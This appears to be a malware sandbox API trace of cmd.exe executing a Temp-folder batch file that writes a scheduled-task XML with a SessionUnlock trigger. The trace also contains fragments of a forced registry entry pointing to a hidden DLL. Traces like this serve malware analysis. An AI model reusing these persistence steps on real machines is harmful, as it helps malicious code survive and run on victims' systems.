[0377.973] GetFileType (hFile=0x7) returned 0x2
[0377.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.973] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.974] _dup (_FileHandle=1) returned 3
[0377.975] _close (_FileHandle=1) returned 0
[0377.976] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.976] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.976] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.976] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.976] GetFileType (hFile=0x64) returned 0x1
[0377.976] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18e
[0377.976] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x18d
[0377.977] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.977] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.977] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201740, Size=0x4a) returned 0x201740
[0377.977] GetProcessHeap () returned 0x200000
[0377.977] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201740) returned 0x4a
[0377.977] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 31
[0377.977] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.977] GetFileType (hFile=0x64) returned 0x1
[0377.978] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.978] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 32
[0377.978] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x1f, lpOverlapped=0x0) returned 1
[0377.978] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.980] _close (_FileHandle=3) returned 0
[0377.981] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.981] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.981] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.982] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.982] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.983] SetConsoleInputExeNameW () returned 0x1
[0377.983] GetConsoleOutputCP () returned 0x1b5
[0377.983] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.983] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.984] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.984] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.985] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.985] SetFilePointer (in: hFile=0x64, lDistanceToMove=1143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0377.985] GetProcessHeap () returned 0x200000
[0377.985] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2017a0 | out: hHeap=0x200000) returned 1
[0377.985] GetProcessHeap () returned 0x200000
[0377.986] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.986] GetProcessHeap () returned 0x200000
[0377.986] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.986] GetProcessHeap () returned 0x200000
[0377.986] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0377.986] GetProcessHeap () returned 0x200000
[0377.986] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.986] GetProcessHeap () returned 0x200000
[0377.986] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0377.986] GetProcessHeap () returned 0x200000
[0377.986] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a30 | out: hHeap=0x200000) returned 1
[0377.987] GetProcessHeap () returned 0x200000
[0377.987] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.987] GetProcessHeap () returned 0x200000
[0377.987] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.987] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.987] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0377.987] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xabb, lpOverlapped=0x0) returned 1
[0377.987] SetFilePointer (in: hFile=0x64, lDistanceToMove=1194, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0377.988] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml \r\n", cbMultiByte=51, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml \r\n\r\n\nl\r\ntemp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 51
[0377.988] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.988] GetFileType (hFile=0x64) returned 0x1
[0377.988] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.988] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0377.988] GetProcessHeap () returned 0x200000
[0377.988] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0377.988] GetProcessHeap () returned 0x200000
[0377.988] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0377.988] GetProcessHeap () returned 0x200000
[0377.988] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.989] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.989] GetProcessHeap () returned 0x200000
[0377.989] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.989] GetProcessHeap () returned 0x200000
[0377.990] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0377.990] GetProcessHeap () returned 0x200000
[0377.991] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0377.991] _tell (_FileHandle=3) returned 1194
[0377.991] _close (_FileHandle=3) returned 0
[0377.991] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0377.991] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0377.991] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0377.991] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0377.991] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0377.991] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0377.991] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0377.991] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0377.992] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0377.992] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0377.992] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.992] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.992] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.992] GetFileType (hFile=0x7) returned 0x2
[0377.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.993] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0377.993] _dup (_FileHandle=1) returned 3
[0377.994] _close (_FileHandle=1) returned 0
[0377.995] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0377.995] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.995] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0377.995] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.995] GetFileType (hFile=0x64) returned 0x1
[0377.995] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ad
[0377.996] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x1ac
[0377.996] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0377.996] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.996] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x231400, Size=0x46) returned 0x228730
[0377.996] GetProcessHeap () returned 0x200000
[0377.996] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x228730) returned 0x46
[0377.997] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="true \r\n") returned 27
[0377.997] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.997] GetFileType (hFile=0x64) returned 0x1
[0377.997] _get_osfhandle (_FileHandle=1) returned 0x64
[0377.997] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="true \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="true \r\n", lpUsedDefaultChar=0x0) returned 28
[0377.997] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x1b, lpOverlapped=0x0) returned 1
[0377.997] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0377.999] _close (_FileHandle=3) returned 0
[0378.000] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.000] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.001] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.001] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.002] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.002] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.002] SetConsoleInputExeNameW () returned 0x1
[0378.003] GetConsoleOutputCP () returned 0x1b5
[0378.003] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.003] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.003] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.004] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.004] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.004] SetFilePointer (in: hFile=0x64, lDistanceToMove=1194, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0378.004] GetProcessHeap () returned 0x200000
[0378.004] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a30 | out: hHeap=0x200000) returned 1
[0378.005] GetProcessHeap () returned 0x200000
[0378.005] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228730 | out: hHeap=0x200000) returned 1
[0378.005] GetProcessHeap () returned 0x200000
[0378.005] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.005] GetProcessHeap () returned 0x200000
[0378.005] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2286e0 | out: hHeap=0x200000) returned 1
[0378.006] GetProcessHeap () returned 0x200000
[0378.006] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.006] GetProcessHeap () returned 0x200000
[0378.006] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.006] GetProcessHeap () returned 0x200000
[0378.006] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0378.006] GetProcessHeap () returned 0x200000
[0378.006] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.007] GetProcessHeap () returned 0x200000
[0378.007] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.008] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.008] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0378.008] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xa88, lpOverlapped=0x0) returned 1
[0378.008] SetFilePointer (in: hFile=0x64, lDistanceToMove=1262, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0378.009] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^SessionUnlock^ >> %temp%\\a.xml \r\n", cbMultiByte=68, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^SessionUnlock^ >> %temp%\\a.xml \r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 68
[0378.009] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.009] GetFileType (hFile=0x64) returned 0x1
[0378.009] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.009] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0378.010] GetProcessHeap () returned 0x200000
[0378.010] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.010] GetProcessHeap () returned 0x200000
[0378.010] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.010] GetProcessHeap () returned 0x200000
[0378.010] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.010] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.011] GetProcessHeap () returned 0x200000
[0378.011] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.011] GetProcessHeap () returned 0x200000
[0378.011] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.011] GetProcessHeap () returned 0x200000
[0378.012] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.012] _tell (_FileHandle=3) returned 1262
[0378.013] _close (_FileHandle=3) returned 0
[0378.013] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.013] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.014] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.014] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.014] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.014] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.014] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.014] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.014] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.014] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.015] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.015] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.015] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.015] GetFileType (hFile=0x7) returned 0x2
[0378.056] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.057] _dup (_FileHandle=1) returned 3
[0378.058] _close (_FileHandle=1) returned 0
[0378.059] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.059] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.059] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.059] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.059] GetFileType (hFile=0x64) returned 0x1
[0378.059] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c8
[0378.059] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x1c7
[0378.059] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.060] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.060] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x2017b0, Size=0x68) returned 0x2017b0
[0378.060] GetProcessHeap () returned 0x200000
[0378.060] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x2017b0) returned 0x68
[0378.060] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="SessionUnlock \r\n") returned 44
[0378.060] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.060] GetFileType (hFile=0x64) returned 0x1
[0378.060] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.060] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="SessionUnlock \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SessionUnlock \r\n", lpUsedDefaultChar=0x0) returned 45
[0378.061] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x2c, lpOverlapped=0x0) returned 1
[0378.061] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.065] _close (_FileHandle=3) returned 0
[0378.066] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.066] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.066] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.067] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.067] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.067] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.068] SetConsoleInputExeNameW () returned 0x1
[0378.068] GetConsoleOutputCP () returned 0x1b5
[0378.068] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.068] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.069] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.069] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.069] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.069] SetFilePointer (in: hFile=0x64, lDistanceToMove=1262, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0378.069] GetProcessHeap () returned 0x200000
[0378.069] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201830 | out: hHeap=0x200000) returned 1
[0378.069] GetProcessHeap () returned 0x200000
[0378.070] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2017b0 | out: hHeap=0x200000) returned 1
[0378.070] GetProcessHeap () returned 0x200000
[0378.070] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.070] GetProcessHeap () returned 0x200000
[0378.070] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0378.070] GetProcessHeap () returned 0x200000
[0378.070] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0378.070] GetProcessHeap () returned 0x200000
[0378.070] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.071] GetProcessHeap () returned 0x200000
[0378.071] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.071] GetProcessHeap () returned 0x200000
[0378.071] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.071] GetProcessHeap () returned 0x200000
[0378.071] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.071] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.071] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0378.071] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xa44, lpOverlapped=0x0) returned 1
[0378.072] SetFilePointer (in: hFile=0x64, lDistanceToMove=1316, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0378.072] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\n", cbMultiByte=54, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\ntemp%\\a.xml \r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 54
[0378.072] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.072] GetFileType (hFile=0x64) returned 0x1
[0378.072] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.072] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0378.072] GetProcessHeap () returned 0x200000
[0378.072] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.073] GetProcessHeap () returned 0x200000
[0378.073] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.073] GetProcessHeap () returned 0x200000
[0378.073] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x22) returned 0x21b0c0
[0378.073] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x9
[0378.073] GetProcessHeap () returned 0x200000
[0378.073] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.073] GetProcessHeap () returned 0x200000
[0378.074] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.074] GetProcessHeap () returned 0x200000
[0378.074] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.075] GetProcessHeap () returned 0x200000
[0378.075] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.075] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.075] GetProcessHeap () returned 0x200000
